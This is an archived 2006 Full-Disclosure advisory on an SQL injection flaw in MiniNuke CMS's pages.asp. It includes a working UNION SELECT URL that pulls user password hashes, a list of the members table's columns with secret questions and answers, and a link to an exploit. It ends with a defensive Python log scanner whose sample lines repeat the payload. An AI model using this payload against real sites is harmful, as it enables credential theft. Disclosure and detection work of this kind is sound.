Securityvulns SECURITYVULNS:DOC:11529
Feb 21, 2006 - 12:00 a.m.

[Full-disclosure] MiniNuke CMS System all versions (pages.asp) SQL Injection


EDITED 20/02/2006
–Security Report–
Advisory: MiniNuke CMS System all versions (pages.asp) SQL Injection vulnerability

Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI

Date: 19/02/06 10:31 PM

Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}

Vendor: MiniNuke (www.mini-ex.net) (www.mininuke.info)
Version: All versions released by this vendor.
About: Via this method a remote attacker can inject an SQL query into pages.asp.

How&Example:
GET -> http://[site]/pages.asp?id=1%20[SQLQuery]
Example ->
http://[site]/pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=1
So with this example a remote attacker can get userid 1's hashed password.
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar

Exploit:
http://www.nukedx.com/?getxpl=9

Original advisory:
http://www.nukedx.com/?viewdoc=9
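
For defenders reviewing web-server logs, the following added example (not part of the original advisory or of MiniNuke's code) flags requests to pages.asp whose id parameter is anything other than a plain integer, including double-encoded values. The log layout, sample lines, function names and the assumption that a legitimate id is a short decimal number are all constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample lines in a simplified IIS W3C layout (assumed field order):
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2006-02-21 10:00:01 192.0.2.10 GET /pages.asp id=3 200
2006-02-21 10:00:05 192.0.2.44 GET /pages.asp id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=1 200
2006-02-21 10:00:09 192.0.2.44 GET /Pages.ASP id=3%2520union%2520select 500
2006-02-21 10:00:12 192.0.2.10 GET /default.asp id=abc 200
2006-02-21 10:00:15 192.0.2.77 GET /pages.asp id=7&id=7%20from%20members 200
"""

# Assumption: a legitimate page id is a short decimal integer and nothing else.
INT_ONLY = re.compile(r"[0-9]{1,10}")

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded input is inspected too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_text):
    """Return (client_ip, decoded_id) for pages.asp hits whose id is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # skip W3C header lines and anything not in the assumed layout
        _, _, ip, _, stem, query, _ = fields
        if not stem.lower().endswith("/pages.asp"):
            continue
        # parse_qs decodes once; every repeat of id is checked, empty values included
        for raw in parse_qs(query, keep_blank_values=True).get("id", []):
            value = fully_decode(raw)
            if not INT_ONLY.fullmatch(value):
                hits.append((ip, value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}\tid={value!r}")
```

The same allow-list rule (reject any id that is not a plain integer before it reaches the query) is what the application itself should enforce, alongside parameterized queries.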


Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/